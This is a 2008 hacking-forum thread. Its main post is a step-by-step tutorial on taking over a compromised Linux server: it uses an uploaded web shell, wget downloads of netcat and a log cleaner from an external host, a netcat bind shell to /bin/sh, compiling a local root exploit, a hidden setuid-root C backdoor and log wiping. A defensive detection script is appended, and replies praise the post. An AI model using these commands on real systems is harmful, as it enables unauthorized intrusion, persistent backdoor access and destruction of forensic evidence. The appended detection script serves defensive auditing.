paxnWo Posted November 23, 2008

Required for this tutorial:
Access to a shell - upload a shell onto a box by any means
mig-log cleaner - http://b14ck1c3.freehostia.com/miglc
Netcat - http://www.vulnwatch.org/netcat/nc111nt.zip
Netcat (unix) - http://b14ck1c3.freehostia.com/nc
Local Root Exploit - http://jshooter.by.ru/xpl/
half a brain
willingness to learn

Now that you have all that in order, let's begin.

Go to the path of, or access, your shell by whatever means necessary. Make sure that your shell is in a writable folder just to make things easy for us. In our case today, for this tutorial, we will be using storm7shell, not exactly my favourite but it will get the job done nonetheless. An example of this location would be something like:

http://target/yourshell.php

Now that we are on your shell's page we want to find out what OS this box is running and what version the kernel is. In our case it's Linux 2.6.8. So we will want to find a local root exploit for this kernel version of the Linux OS.

What we want to do now that we have our local root exploit for our kernel is spawn a shell so that we can talk to the victim's box and run our commands without interruption. But how are we supposed to do that? This can be done by using a tool called Netcat. So now that we have a copy of Netcat we will go to the shell, find the command execution area of the shell and enter:

wget http://b14ck1c3.freehostia.com/nc

What this will do is download the Netcat file I have pre-compiled and hosted for you onto the victim box, to the location of your shell. Once we have the download complete we will want to chmod it so that our user has access to run it.
This can be done by entering:

chmod +x nc

What this does is grant everyone (user, group and other) execute permission to the file nc which we had just previously downloaded onto the box with the wget command.

Now that we have nc installed on both the victim machine and your own, it's time to make our connection. How do we make a connection with nc? In the command execution area of your shell enter:

./nc -l -p 8080 -e /bin/sh

(the shell can be /bin/sh or cmd.exe, for example)

And then on the Netcat installed on your PC you will want to enter:

nc VictimIP Port (in our case 8080), e.g. nc 123.123.123.123 8080

What this will do is cause the Netcat on the victim's box to listen on port 8080 and shovel back an interactive shell for you once you make the connection from which you typed:

nc victimip port

Now that we have our interactive shell spawned we can start to prepare the box for rooting. First we will want to get our local root exploit onto the box and get it compiled if it's not already. This can be done by once again using that nifty wget command we learned about in the previous steps.

wget http://yoursite/xpl

What we have done is now downloaded your exploit. If your exploit is not already compiled you will need to compile it in order to run it. Compiling your exploit can be done by using gcc, like so:

gcc xpl.c -o xpl; chmod +x xpl

This will compile your xpl.c and output it into a file called xpl, which will be the compiled copy of your exploit, and then chmod xpl. Now you are ready to run your exploit and get your root on. Exploits will vary in their usage, so make sure you have an understanding of the root exploit you are using. You can run your xpl file by entering:

./xpl

Wait until your exploit is finished running; once it is done enter:

whoami

What the whoami command does is tell you who you are; if this tells you root then your xpl has done its job and you now have root privs on the box.
Or you can type:

id

which will give you something like:

uid=0(root) gid=0(root) groups=500(apache)

or something similar. And now you can do your happy dance.

Now that we have rooted the box and finished humiliating ourselves by dancing around, we want to make sure that we can come and go as we please without all the hassle of rooting the box over and over. So we will want to create some kind of backdoor. We can make this happen with a few lines of code:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Setuid-root backdoor. When the binary is owned by root and carries the
 * setuid bit, the kernel starts it with effective uid 0; setuid(0) then
 * also sets the real and saved uids to 0, so the bash that system() spawns
 * keeps root. Only the user id is set here; the program makes no setgid()
 * or setgroups() call. */
int main(void)
{
    setuid(0);
    system("/bin/bash");
    return 0;
}

Compile it and change permissions:

root@foobar /root# gcc -o .bkdr main.c
root@foobar /root# chown root:root .bkdr
root@foobar /root# chmod +s .bkdr

Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferably in the $PATH) and if you execute it as another user:

raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami
root

Now you have your access back.

Alright, we have almost completed our mission: we have successfully rooted our victim's box and created our backdoor; now all we need to do is wipe the tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner, which you can get here:

http://b14ck1c3.freehostia.com/miglc

Once again we can use our wget command to upload our log cleaner to the rooted box.

wget http://b14ck1c3.freehostia.com/miglc; chmod +x miglc

Now just run the log cleaner:

./miglc

The mig-log cleaner has a wide variety of functions which are displayed when you run the log cleaner, so you may choose how exactly you want to clean the logs with the commands given to you.

Credits: w3tw0rk
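The post above leaves two concrete artifacts on the box: a root-owned setuid binary with a dotfile name dropped into a $PATH directory, and a netcat process started with -e. The following shell functions are an added example, not part of paxnWo's post and not code from storm7shell or mig-log cleaner; they enumerate exactly those artifacts so that a defender, or a pentester checking that a test box was cleaned up, can find them. The directory arguments, the dotfile heuristic and the ps column layout are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): locate the artifacts the
# tutorial's backdoor and bind shell leave behind.

# find_setuid DIR... : list every regular file directly inside the given
# directories that has the setuid or setgid bit set. Owner and mode are
# printed with ls -ld so root-owned hits can be triaged first.
find_setuid() {
    find "$@" -maxdepth 1 -type f \( -perm -4000 -o -perm -2000 \) \
        -exec ls -ld {} \; 2>/dev/null
}

# hidden_setuid DIR... : among the setuid/setgid files, print only the
# paths whose name starts with a dot, the way the post hides .bkdr.
# Assumption: legitimate setuid binaries do not use dotfile names.
hidden_setuid() {
    find "$@" -maxdepth 1 -type f \( -perm -4000 -o -perm -2000 \) \
        -name '.*' 2>/dev/null
}

# audit_path : run find_setuid over every directory currently in $PATH,
# since that is where the post recommends placing the backdoor.
audit_path() {
    oldifs=$IFS
    IFS=:
    set -- $PATH
    IFS=$oldifs
    for d in "$@"; do
        [ -d "$d" ] && find_setuid "$d"
    done
    return 0
}

# nc_listeners : report running netcat processes started with -e, i.e. a
# bind or reverse shell. The [n] trick keeps grep from matching itself.
# Assumption: ps supports the -o pid,args format (Linux procps, BSD ps).
nc_listeners() {
    ps -eo pid,args 2>/dev/null | grep -E '[n]c(at)? .*-e ' || true
}

# When run directly with --run, audit the live system.
if [ "${1:-}" = "--run" ]; then
    audit_path
    nc_listeners
fi
```

Run it as `sh audit.sh --run` on the box; a line such as `-rwsr-sr-x 1 root root ... /usr/local/bin/.bkdr` is the setuid backdoor from the post, and any `nc -l -p 8080 -e /bin/sh` line is the listener. A clean box should return nothing from hidden_setuid, while find_setuid will still list the distribution's legitimate setuid helpers, so compare that list against the package manager's records rather than treating every hit as hostile.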
MrRip Posted November 23, 2008

Good job paxnWo. You bring us very interesting tutorials. Congrats.
noes Posted August 23, 2009

Thanks, very good tutorial. Covering all steps needed... Can you please update the local exploit links? ... I cannot get one for Solaris 5.9. Thanks.